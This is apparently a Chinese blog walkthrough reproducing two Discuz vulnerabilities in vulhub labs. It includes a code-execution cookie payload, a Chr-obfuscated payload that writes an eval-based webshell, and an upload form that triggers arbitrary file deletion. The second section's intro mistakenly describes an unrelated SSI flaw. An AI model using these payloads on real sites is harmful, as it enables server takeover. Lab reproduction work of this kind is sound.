【vulhub】discuz

已于 2022-05-02 13:47:10 修改
阅读量934 收藏
点赞数
分类专栏: 漏洞复现 文章标签: php 安全
于 2022-05-02 13:34:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/haoaaao/article/details/124539702
版权

0x00 wooyun-2010-080723(命令执行)

1、简介

2、影响版本

Discuz 7.x 6.x版本

3、搭建

安装discuz

安装数据库。数据库服务器填写db(必须db,不然安装失败)

4、复现

在默认板块,随便点进去一个帖子,用burp抓包:

 

构造payload:

修改cookie内容

GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

 

执行成功后,写入shell

GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(120).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(112).Chr(119).Chr(100).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59))

 在上述代码中,文件为:x.php   密码为: pwd

连一下antsword 

0x01 x3.4-arbitrary-file-deletion(任意文件删除)

1、简介

        在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用<!--#exec cmd="id" -->语法执行任意命令。

2、影响版本

Discuz!X ≤3.4

3、搭建

 

 

4、复现

访问http://your-ip/robots.txt可见robots.txt是存在的:

注册用户,然后找formhash

 带上cookie和formhash发送数据包

 

 

构造upload.html,写上自己的formhash

<body>
    <form action="http://192.168.1.142/home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=
[formhash]" method="post" enctype="multipart/form-data">
        <input type="file" name="birthprovince" />
        <input type="submit" value="upload" />
    </form>
</body>

用浏览器打开该页面,上传一个正常图片。此时脏数据应该已被提取出,漏洞已经利用结束。

再次访问http://your-ip/robots.txt,发现文件成功被删除:

Discuz 3.x 任意文件删除漏洞复现_小白头发少的博客-优快云博客 

vulhub通关实战一(附docker vulhub 虚拟机环境)
悦分享
12-26 1987
docker vulhub 虚拟机环境:docker-compose up -d 启动服务:登录7001端口用户名weblogic,密码Oracle@123。
搭建Vulhub漏洞靶场
qq_43936524的博客
02-16 1340
文章目录环境安装安装Docker安装Docker-Compose安装VulhubDocker加速Vulhub使用 环境安装 安装Docker sudo apt install docker.io 或者 curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun(比较快) 输入docker显示下面的页面则安装完成: 安装Docker-Compose 在Docker-Compose下载最新版本的docker-compose-Linux
利用Vulnhub复现漏洞 - Discuz 7.x/6.x 全局变量防御绕过导致代码执行
JiangBuLiu的博客
06-28 956
Discuz 7.x/6.x 全局变量防御绕过导致代码执行Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/httpd/ssi-rce/ 漏洞原理 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过...
vulhub漏洞复现八_discuz
weixin_44193247的博客
01-09 1470
vulhub漏洞复现练习篇
vulhubDiscuz-命令执行 wooyun-2010-080723
weixin_42884199的博客
12-06 2022
一、启动靶机 docker-compose build docker-compose up -d 二、安装 URL: http://192.168.150.146:8080/install 安装数据库。数据库服务器填写db(必须db,不然安装失败),数据库名为discuz,数据库账号密码均为root,管理员密码任意。填写联系方式页面直接点击跳过本步后跳转到首页,登录成功后进入默认板块,开启Burp抓包,然后随便点击一篇贴子 将Cookie修改为下面,点击放包 三、构造payload 请求: GET
Vulhub靶场Discuz-命令执行(wooyun-2010-080723)漏洞复现
X_python321的博客
05-16 566
Discuz-命令执行(wooyun-2010-080723)漏洞复现
Vulhub搭建小记
weixin_30510153的博客
12-04 162
建议您通读全文后,在了解大体思路的前提下搞。 0x00 VMware安装 ubuntu 18.04 dektop 64bit http://releases.ubuntu.com/18.04/ubuntu-18.04.1-desktop-amd64.iso 安装步骤:参考https://www.cnblogs.com/Alier/p/6337151.html 0x01 ubuntu 配置...
使用Centos安装搭建docker+vulhub靶场
weixin_48345375的博客
09-29 2828
环境介绍 Centos 7(VMware虚拟机):搭建漏洞测试环境 网络连接配置:NAT模式 ip地址:192.168.50.123 windows10(宿主机): ip地址:192.168.50.230 安装Docker需要是Linux内核要3.10以上,使用 uname -a 查看系统信息 一、配置yum源 1、备份  cd /etc/yum.repos.d  mkdir repos_bak  ###建立备份使用的文件夹 ...
Kali安装vulhub漏洞环境
xgchenghai的博客
05-23 2399
在费劲地搞定vulapps环境安装后,对安装漏洞环境貌似上瘾了,再装一个vulhub漏洞环境吧。 这次就继续在kali2009上安装,希望一切顺利。 1、简介 Vulhub是一个面向大众的开源漏洞靶场,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。安装 docker和 docker-compose后即可开始使用vulhub。 项目地址: https://github.com/vulhub/vulhub 2、安装过程 安装过程记录如下: #需要pip root@kali:/# apt-.
利用Vulnhub复现漏洞 - Discuz!X ≤3.4 任意文件删除漏洞
JiangBuLiu的博客
06-28 3337
Apache SSI 远程命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现FormhashCookie发送数据包 Vulnhub官方复现教程 https://vulhub.org/#/environments/httpd/ssi-rce/ 漏洞原理 在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个...
vulhub
03-10
Vulhub
vulhub安装时的问题
weixin_43733035的博客
03-29 588
在安装vulhub时,出现cannot import transport或者是无法导入其他的模块 从网上找到的方法都尝试之后均不行,这个文件夹明明存在,但是他就是说找不到. 解决方法:在使用pip进行安装的时候,网上找的他们都是直接默认安装的python3,而我的却是python2和python3一起存在.最后发现,只需要使用pip3安装即可 pip3 install docker-comp...
Discuz开源论坛_v3.4系列_远程代码执行漏洞详解
weixin_60708754的博客
05-15 5518
Discuz v3.4系列 远程代码执行漏洞全流程详解
Discuz X 3.4 系列漏洞梳理
热门推荐
weixin_50464560的博客
04-05 2万+
分析了目前已经公开的Dz3.4系列漏洞,作为学习和记录。 Discuz!X ≤3.4 任意文件删除漏洞 1、简述 漏洞原因:之前存在的任意文件删除漏洞修复不完全导致可以绕过。 漏洞修复时间:2017年9月29日官方对gitee上的代码进行了修复 2、复现环境 因为官方提供的下载是最新的源码,漏洞修复时间是17年9月29日,通过git找一个修复前的版本签出就可。 git checkout 1a912ddb4a62364d1736fa4578b42ecc62c5d0be 通过安装向导安装完.
Discuz! 系列<=3.4 后台 sql注入漏洞
weixin_46801402的博客
07-29 5012
Discuz!X全版本存在SQL注入漏洞。漏洞产生的原因是source\admincp\admincp_setting.php在处理$settingnew['uc']['appid']参数时未进行完全过滤,导致出现二次注入。在特定条件下,攻击者可以利用该漏洞获取服务器权限。...
Discuz!X ≤3.4 任意文件删除漏洞 漏洞复现
ADummy的博客
02-05 1499
Discuz!X ≤3.4 任意文件删除漏洞 by ADummy 0x00利用路线 ​ Discuz个人设置界面—>burpsuite抓包改包—>上传文件替换脏数据—>导致文件删除 0x01漏洞介绍 ​ 通过配置个人信息的属性值,导致文件删除。 ​ 影响版本 Discuz <= 3.4 0x02漏洞复现 ​ 安装Discuz,数据库地址为db ​ 查看robots文件,此时文件存在 ​ 登录,并进去设置页面,点击保存并抓包,formhash值记一下。
【分析】Discuz 3.4 越权登陆漏洞分析
Peter 的博客
02-21 2万+
概述 Discuz是一个通用的社区论坛软件系统。最近看到一个Discuz逻辑漏洞,该漏洞源于Discuz微信登陆功能。Discuz 3.4默认安装了微信登陆。利用这个漏洞攻击者可以越权登陆论坛其他会员的账号甚至是管理员账号,主要还得看脸。 原理 首先看了下作者的描述,“如果有用户点了一下绑定微信,但是并没有绑定” 这句话说的很模糊,开始没有明白什么意思。然后跟进代码看了一下。 漏洞源码位于/u...
Discuz3.4X ssrf漏洞学习与利用
sangfor_edu的博客
06-08 2702
由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务。主要形成原因是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。...
Discuz!X ≤3.4 任意文件删除漏洞
最新发布
qq_52627570的博客
05-23 618
在浏览器中输入:http://your ip/install/index.php?在浏览器中输入:http://your ip/robots.txt。数据库服务器选择db,其他不改变,记得输入管理员密码哦。点击进入数据库,在设置->个人资料中随意填写一个信息。建立一个upload.html。在浏览器打开,并上传一个图片。提交后,发现信息已改变。至此,漏洞利用结束。
ActiveMQ与Apache HTTPD安全漏洞深度解析
12. Discuz论坛系列漏洞:包括全局变量防御绕过导致代码执行(wooyun-2010-080723)和任意文件删除(x3.4-arbitrary-file-deletion),这些漏洞影响了Discuz论坛的用户安全。 13. Django调试页面XSS漏洞(CVE-2017-12794...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

haoaaao

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值